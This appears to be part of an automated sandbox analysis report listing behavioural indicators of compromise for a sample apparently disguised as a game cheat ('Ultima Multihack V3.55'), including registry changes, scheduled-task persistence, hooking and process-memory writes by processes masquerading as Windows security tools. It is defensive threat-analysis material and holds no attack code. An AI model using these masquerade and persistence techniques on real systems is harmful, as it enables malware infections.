description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "159" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895659034012815" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\NodeSlot = "4" chrome.exe Key created \Registry\User\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\NotificationData chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "4294967295" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 = 14002e80922b16d365937a46956b92703aca08af0000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e8005398e082303024b98265d99428e115f0000 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "3" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" chrome.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Ultima Multihack V3.55.rar:Zone.Identifier chrome.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5304 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 2196 powershell.exe 2196 powershell.exe 2196 powershell.exe 1168 powershell.exe 1168 powershell.exe 1168 powershell.exe 1876 chrome.exe 1876 chrome.exe 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 2000 WINDOWS SECURITY NANO.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 5072 ULTIME MULTIHACK REBORN.EXE 2840 WINDOWS DEFENDER.EXE 2840 WINDOWS DEFENDER.EXE 2840 WINDOWS DEFENDER.EXE 2840 WINDOWS DEFENDER.EXE -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3792 chrome.exe 2000 WINDOWS SECURITY NANO.EXE 5652 msdcsc.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 56 IoCs
pid Process 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 4200 msedge.exe 4200 msedge.exe 6900 chrome.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe 4200 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe Token: SeShutdownPrivilege 5820 chrome.exe Token: SeCreatePagefilePrivilege 5820 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 4704 WindowsTerminal.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe -
Suspicious use of SendNotifyMessage 52 IoCs
pid Process 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 5820 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 3544 chrome.exe 6544 firefox.exe 6544 firefox.exe 6544 firefox.exe 6544 firefox.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 6900 chrome.exe 4200 msedge.exe 4200 msedge.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 712 chrome.exe 3792 chrome.exe 1164 Ultima Multihack V3.55.exe 1264 file5.exe 668 VLC1.EXE 5652 msdcsc.exe 1876 msdcsc.exe 4704 WindowsTerminal.exe 6544 firefox.exe 6544 firefox.exe 6544 firefox.exe 6544 firefox.exe 6544 firefox.exe 6544 firefox.exe 6544 firefox.exe 4316 WindowsTerminal.exe 4708 LogonUI.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5820 wrote to memory of 224 5820 chrome.exe 78 PID 5820 wrote to memory of 224 5820 chrome.exe 78 PID 5820 wrote to memory of 2276 5820 chrome.exe 79 PID 5820 wrote to memory of 2276 5820 chrome.exe 79 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 1656 5820 chrome.exe 80 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 5820 chrome.exe 81 PID 5820 wrote to memory of 5644 